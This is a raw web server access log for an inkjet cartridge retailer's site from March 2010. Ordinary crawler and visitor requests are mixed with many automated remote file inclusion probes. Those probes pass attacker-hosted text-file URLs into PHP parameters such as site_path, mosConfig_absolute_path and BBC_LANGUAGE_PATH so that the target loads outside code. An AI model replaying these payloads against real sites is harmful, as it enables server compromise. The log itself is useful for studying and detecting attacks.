85.233.162.101 - - [02/Mar/2010:08:32:09 -0800] "GET /logs/scripts.log//include/bbs.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
210.114.222.95 - - [02/Mar/2010:08:32:37 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
210.114.222.95 - - [02/Mar/2010:08:32:39 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
210.114.222.95 - - [02/Mar/2010:08:32:39 -0800] "GET /logs/scripts.log//include/admin.lib.inc.php?site_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:08:32:43 -0800] "GET /phpbb/viewtopic.php?p=59 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
203.59.136.42 - - [02/Mar/2010:08:35:19 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.59.136.42 - - [02/Mar/2010:08:35:21 -0800] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.59.136.42 - - [02/Mar/2010:08:35:21 -0800] "GET /include/bbs.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.241.83.107 - - [02/Mar/2010:08:35:56 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 200 1086 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.241.83.107 - - [02/Mar/2010:08:35:56 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 200 2132 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.241.83.107 - - [02/Mar/2010:08:36:00 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.241.83.107 - - [02/Mar/2010:08:36:00 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 200 1086 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.241.83.107 - - [02/Mar/2010:08:36:00 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 200 2132 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:08:37:41 -0800] "GET /blog1/ HTTP/1.0" 200 6233 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:08:37:41 -0800] "GET /blog1/styles-site.css HTTP/1.0" 200 237 "http://site.inkjetcartridge.com/blog1/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:08:37:42 -0800] "GET /blog-mt1/mt-static/themes/base-weblog.css HTTP/1.0" 200 6515 "http://site.inkjetcartridge.com/blog1/styles-site.css" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:08:37:42 -0800] "GET /blog-mt1/mt-static/themes/theme-stevenson/theme-stevenson.css HTTP/1.0" 200 10392 "http://site.inkjetcartridge.com/blog1/styles-site.css" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
71.117.54.38 - - [02/Mar/2010:08:45:25 -0800] "GET /email/images/inkmail21_02.gif HTTP/1.1" 200 15159 "http://us.mg202.mail.yahoo.com/dc/blank.html?bn=300.3&.intl=us&.lang=en-US" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)" "site.inkjetcartridge.com"
71.117.54.38 - - [02/Mar/2010:08:45:25 -0800] "GET /email/images/inkmail21_01.gif HTTP/1.1" 200 7485 "http://us.mg202.mail.yahoo.com/dc/blank.html?bn=300.3&.intl=us&.lang=en-US" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)" "site.inkjetcartridge.com"
98.252.235.231 - - [02/Mar/2010:08:50:50 -0800] "GET /images/brother-mfc-5460cn.jpg HTTP/1.1" 200 20615 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
98.252.235.231 - - [02/Mar/2010:08:50:50 -0800] "GET /images/canon-pixma-pro9000.jpg HTTP/1.1" 200 24854 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
98.252.235.231 - - [02/Mar/2010:08:50:50 -0800] "GET /images/epson-c88.jpg HTTP/1.1" 200 6555 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
98.252.235.231 - - [02/Mar/2010:08:50:50 -0800] "GET /images/brother-mfc-885cw.jpg HTTP/1.1" 200 27931 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
98.252.235.231 - - [02/Mar/2010:08:50:50 -0800] "GET /images/canon-pixma-ip3500.jpg HTTP/1.1" 200 39459 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
98.252.235.231 - - [02/Mar/2010:08:50:50 -0800] "GET /images/hp-laserjet3050.jpg HTTP/1.1" 200 19965 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
98.252.235.231 - - [02/Mar/2010:08:50:50 -0800] "GET /images/samsung-clip-300.jpg HTTP/1.1" 200 24467 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
98.252.235.231 - - [02/Mar/2010:08:50:50 -0800] "GET /images/brother-mfc-240cn.jpg HTTP/1.1" 200 23620 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
98.252.235.231 - - [02/Mar/2010:08:50:50 -0800] "GET /images/canon-pixma-ip4500.jpg HTTP/1.1" 200 28688 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
98.252.235.231 - - [02/Mar/2010:08:50:50 -0800] "GET /images/epson-r2400.jpg HTTP/1.1" 200 3335 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:08:53:15 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:08:53:15 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:08:53:15 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:08:54:15 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:08:54:15 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:08:54:15 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.59.136.42 - - [02/Mar/2010:08:58:07 -0800] "GET /logs/scripts.log//include/bbs.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:08:59:40 -0800] "GET /phpbb/viewtopic.php?p=2995 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
89.149.244.84 - - [02/Mar/2010:09:04:09 -0800] "GET /phpbb/posting.php?mode=reply&t=176 HTTP/1.1" 200 534 "http://site.inkjetcartridge.com/phpbb/viewtopic.php?t=176&start=300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "site.inkjetcartridge.com"
86.153.247.203 - - [02/Mar/2010:09:04:10 -0800] "POST /phpbb/posting.php HTTP/1.1" 200 534 "http://site.inkjetcartridge.com/phpbb/posting.php?mode=reply&t=176" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:09:07:14 -0800] "GET /phpbb/viewtopic.php?t=620 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:09:09:20 -0800] "GET /phpbb/viewtopic.php?t=755 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:09:13:32 -0800] "GET /phpbb/viewtopic.php?t=942 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
66.142.195.205 - - [02/Mar/2010:09:20:27 -0800] "GET /boomerang_images/amd.gif HTTP/1.1" 200 10242 "http://www.boomerangs.com/corporategifts.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2; MS-RTC LM 8)" "site.inkjetcartridge.com"
66.142.195.205 - - [02/Mar/2010:09:20:27 -0800] "GET /boomerang_images/mini2.gif HTTP/1.1" 200 7156 "http://www.boomerangs.com/corporategifts.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2; MS-RTC LM 8)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:09:36:51 -0800] "GET /phpbb/viewtopic.php?t=2493&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:09:43:12 -0800] "GET /phpbb/viewtopic.php?p=172 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:09:47:24 -0800] "GET /logs/access.log///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:09:47:24 -0800] "GET //write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:09:47:24 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.59.136.42 - - [02/Mar/2010:09:48:50 -0800] "GET //write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.59.136.42 - - [02/Mar/2010:09:48:50 -0800] "GET /logs/access.log///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.59.136.42 - - [02/Mar/2010:09:48:50 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:09:49:26 -0800] "GET /logs/access.log///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:09:49:26 -0800] "GET //write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:09:49:26 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:09:49:30 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:09:49:30 -0800] "GET //write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:09:49:30 -0800] "GET /logs/access.log///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
99.241.129.19 - - [02/Mar/2010:09:52:07 -0800] "GET /images/epson-c88.jpg HTTP/1.1" 200 6555 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6" "site.inkjetcartridge.com"
99.241.129.19 - - [02/Mar/2010:09:52:07 -0800] "GET /images/canon-pixma-ip4500.jpg HTTP/1.1" 200 28688 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6" "site.inkjetcartridge.com"
99.241.129.19 - - [02/Mar/2010:09:52:07 -0800] "GET /images/brother-mfc-885cw.jpg HTTP/1.1" 200 27931 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6" "site.inkjetcartridge.com"
99.241.129.19 - - [02/Mar/2010:09:52:07 -0800] "GET /images/epson-r2400.jpg HTTP/1.1" 200 3335 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6" "site.inkjetcartridge.com"
99.241.129.19 - - [02/Mar/2010:09:52:07 -0800] "GET /images/brother-mfc-240cn.jpg HTTP/1.1" 200 23620 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6" "site.inkjetcartridge.com"
99.241.129.19 - - [02/Mar/2010:09:52:07 -0800] "GET /images/canon-pixma-pro9000.jpg HTTP/1.1" 200 24854 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6" "site.inkjetcartridge.com"
99.241.129.19 - - [02/Mar/2010:09:52:07 -0800] "GET /images/hp-laserjet3050.jpg HTTP/1.1" 200 19965 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6" "site.inkjetcartridge.com"
99.241.129.19 - - [02/Mar/2010:09:52:07 -0800] "GET /images/samsung-clip-300.jpg HTTP/1.1" 200 24467 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6" "site.inkjetcartridge.com"
71.179.111.49 - - [02/Mar/2010:09:52:21 -0800] "GET /email/images/inkmail21_05.gif HTTP/1.1" 200 15725 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MSOffice 12)" "site.inkjetcartridge.com"
71.179.111.49 - - [02/Mar/2010:09:52:21 -0800] "GET /email/images/inkmail21_06.gif HTTP/1.1" 200 24052 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MSOffice 12)" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:09:52:53 -0800] "GET //write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:09:52:53 -0800] "GET /logs/access.log%20%20///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:09:52:53 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:09:53:25 -0800] "GET /logs/access.log%20%20///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:09:53:25 -0800] "GET //write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:09:53:25 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.239.227.209 - - [02/Mar/2010:09:59:53 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.239.227.209 - - [02/Mar/2010:09:59:53 -0800] "GET /logs/scripts.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.239.227.209 - - [02/Mar/2010:09:59:53 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:02:49 -0800] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:02:49 -0800] "GET /logs//administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:02:49 -0800] "GET /logs/scripts.log//administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:03:05 -0800] "GET /logs//administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:03:05 -0800] "GET /logs/scripts.log//administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:03:05 -0800] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:03:22 -0800] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:03:22 -0800] "GET /logs//administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:03:22 -0800] "GET /logs/scripts.log//administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.59.136.42 - - [02/Mar/2010:10:03:29 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:10:03:31 -0800] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:10:03:31 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:10:03:31 -0800] "GET /logs/access.log//bbs//write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.59.136.42 - - [02/Mar/2010:10:03:34 -0800] "GET /logs/access.log%20%20///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.59.136.42 - - [02/Mar/2010:10:03:34 -0800] "GET //write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:10:03:47 -0800] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:10:03:47 -0800] "GET /logs//administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:10:03:48 -0800] "GET /logs/scripts.log//administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:10:04:31 -0800] "GET /logs//administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:10:04:31 -0800] "GET /logs/scripts.log//administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:10:04:31 -0800] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:10:04:41 -0800] "GET /phpbb/viewtopic.php?p=910 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
203.59.136.42 - - [02/Mar/2010:10:05:52 -0800] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.59.136.42 - - [02/Mar/2010:10:05:52 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
